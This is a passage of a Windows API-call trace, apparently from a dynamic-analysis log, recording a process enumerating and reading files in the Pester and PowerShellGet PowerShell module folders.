ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x731, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.nuspec", cAlternateFileName="")) returned 1 [0227.747] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psd1", cAlternateFileName="")) returned 1 [0227.747] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x62de, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.psm1", cAlternateFileName="")) returned 1 [0227.747] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5f862d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4b06, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pester.Tests.ps1", cAlternateFileName="")) returned 1 [0227.747] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e5d23d2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4e5d23d2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4e5d23d2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1124, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.md", cAlternateFileName="")) returned 1 [0227.748] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x329315c, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x329315c, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Snippets", cAlternateFileName="")) returned 1 [0227.748] FindNextFileW (in: hFindFile=0x25b73cd2010, lpFindFileData=0x653ef8cf80 | out: lpFindFileData=0x653ef8cf80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.748] FindClose (in: hFindFile=0x25b73cd2010 | out: hFindFile=0x25b73cd2010) returned 1 [0227.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d1e0) returned 1 [0227.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d1a0) returned 1 [0227.748] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psd1")) returned 0xffffffff [0227.748] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.psm1")) returned 0xffffffff [0227.749] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.cdxml")) returned 0xffffffff [0227.749] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.xaml")) returned 0xffffffff [0227.749] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\3.3.5.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\3.3.5.dll")) returned 0xffffffff [0227.749] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0227.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3f0) returned 1 [0227.749] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester" (normalized: "c:\\program files\\windowspowershell\\modules\\pester"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d4d0 | out: lpFileInformation=0x653ef8d4d0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0227.749] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d3b0) returned 1 [0227.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d440) returned 1 [0227.749] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x653ef8cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0227.749] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\*"), lpFindFileData=0x653ef8d150 | out: lpFindFileData=0x653ef8d150*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2430 [0227.750] FindNextFileW (in: hFindFile=0x25b73cd2430, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.750] FindNextFileW (in: hFindFile=0x25b73cd2430, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x31fa7f6, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0227.750] FindNextFileW (in: hFindFile=0x25b73cd2430, lpFindFileData=0x653ef8d110 | out: lpFindFileData=0x653ef8d110*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.750] FindClose (in: hFindFile=0x25b73cd2430 | out: hFindFile=0x25b73cd2430) returned 1 [0227.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d370) returned 1 [0227.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d330) returned 1 [0227.750] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d010, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0227.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d460) returned 1 [0227.750] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d540 | out: lpFileInformation=0x653ef8d540*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0227.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0227.751] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x105, lpBuffer=0x653ef8cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0227.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d200) returned 1 [0227.751] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x804 [0227.751] GetFileType (hFile=0x804) returned 0x1 [0227.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d170) returned 1 [0227.751] GetFileType (hFile=0x804) returned 0x1 [0227.751] ReadFile (in: hFile=0x804, lpBuffer=0x25b5c1c8998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d2d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1c8998*, lpNumberOfBytesRead=0x653ef8d2d8*=0x1000, lpOverlapped=0x0) returned 1 [0227.751] ReadFile (in: hFile=0x804, lpBuffer=0x25b5c1c8998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d2d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1c8998*, lpNumberOfBytesRead=0x653ef8d2d8*=0x1000, lpOverlapped=0x0) returned 1 [0227.752] ReadFile (in: hFile=0x804, lpBuffer=0x25b5c1c8998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d2d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1c8998*, lpNumberOfBytesRead=0x653ef8d2d8*=0x1000, lpOverlapped=0x0) returned 1 [0227.752] ReadFile (in: hFile=0x804, lpBuffer=0x25b5c1c8998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d2d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1c8998*, lpNumberOfBytesRead=0x653ef8d2d8*=0x5e5, lpOverlapped=0x0) returned 1 [0227.752] ReadFile (in: hFile=0x804, lpBuffer=0x25b5c1c7ebd, nNumberOfBytesToRead=0x21b, lpNumberOfBytesRead=0x653ef8d2d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1c7ebd*, lpNumberOfBytesRead=0x653ef8d2d8*=0x0, lpOverlapped=0x0) returned 1 [0227.752] ReadFile (in: hFile=0x804, lpBuffer=0x25b5c1c8998, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d2d8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1c8998*, lpNumberOfBytesRead=0x653ef8d2d8*=0x0, lpOverlapped=0x0) returned 1 [0227.752] CloseHandle (hObject=0x804) returned 1 [0227.757] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0227.757] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psm1")) returned 0xffffffff [0227.757] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.cdxml")) returned 0xffffffff [0227.757] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.xaml")) returned 0xffffffff [0227.757] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.dll")) returned 0xffffffff [0227.757] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.757] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x653ef8cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0227.757] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd20d0 [0227.758] FindNextFileW (in: hFindFile=0x25b73cd20d0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.758] FindNextFileW (in: hFindFile=0x25b73cd20d0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0227.758] FindNextFileW (in: hFindFile=0x25b73cd20d0, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0227.758] FindClose (in: hFindFile=0x25b73cd20d0 | out: hFindFile=0x25b73cd20d0) returned 1 [0227.758] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.759] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.759] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3e0) returned 1 [0227.760] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x105, lpBuffer=0x653ef8cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0227.760] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\*"), lpFindFileData=0x653ef8d0f0 | out: lpFindFileData=0x653ef8d0f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd2370 [0227.760] FindNextFileW (in: hFindFile=0x25b73cd2370, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.760] FindNextFileW (in: hFindFile=0x25b73cd2370, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0227.760] FindNextFileW (in: hFindFile=0x25b73cd2370, lpFindFileData=0x653ef8d0b0 | out: lpFindFileData=0x653ef8d0b0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 0 [0227.761] FindClose (in: hFindFile=0x25b73cd2370 | out: hFindFile=0x25b73cd2370) returned 1 [0227.761] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0227.761] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d2d0) returned 1 [0227.761] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d250) returned 1 [0227.761] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0227.761] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\*"), lpFindFileData=0x653ef8cf60 | out: lpFindFileData=0x653ef8cf60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd11d0 [0227.761] FindNextFileW (in: hFindFile=0x25b73cd11d0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.761] FindNextFileW (in: hFindFile=0x25b73cd11d0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd27a88b, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0227.762] FindNextFileW (in: hFindFile=0x25b73cd11d0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ac4, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerShellGet.psd1", cAlternateFileName="POWERS~1.PSD")) returned 1 [0227.762] FindNextFileW (in: hFindFile=0x25b73cd11d0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Format.ps1xml", cAlternateFileName="PSGETF~1.PS1")) returned 1 [0227.762] FindNextFileW (in: hFindFile=0x25b73cd11d0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97173029, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x143ce, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSGet.Resource.psd1", cAlternateFileName="PSGETR~1.PSD")) returned 1 [0227.762] FindNextFileW (in: hFindFile=0x25b73cd11d0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 1 [0227.762] FindNextFileW (in: hFindFile=0x25b73cd11d0, lpFindFileData=0x653ef8cf20 | out: lpFindFileData=0x653ef8cf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b93ba, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97173029, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97199283, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSModule.psm1", cAlternateFileName="PSMODU~1.PSM")) returned 0 [0227.763] FindClose (in: hFindFile=0x25b73cd11d0 | out: hFindFile=0x25b73cd11d0) returned 1 [0227.763] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d180) returned 1 [0227.763] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d140) returned 1 [0227.763] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d250) returned 1 [0227.763] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x653ef8cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1", lpFilePart=0x0) returned 0x40 [0227.763] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\*" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\*"), lpFindFileData=0x653ef8cf60 | out: lpFindFileData=0x653ef8cf60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x25b73cd23d0 [0227.763] FindNextFileW (in: hFindFile=0x25b73cd23d0, lpFindFileData=0x653ef8cf20 | out: 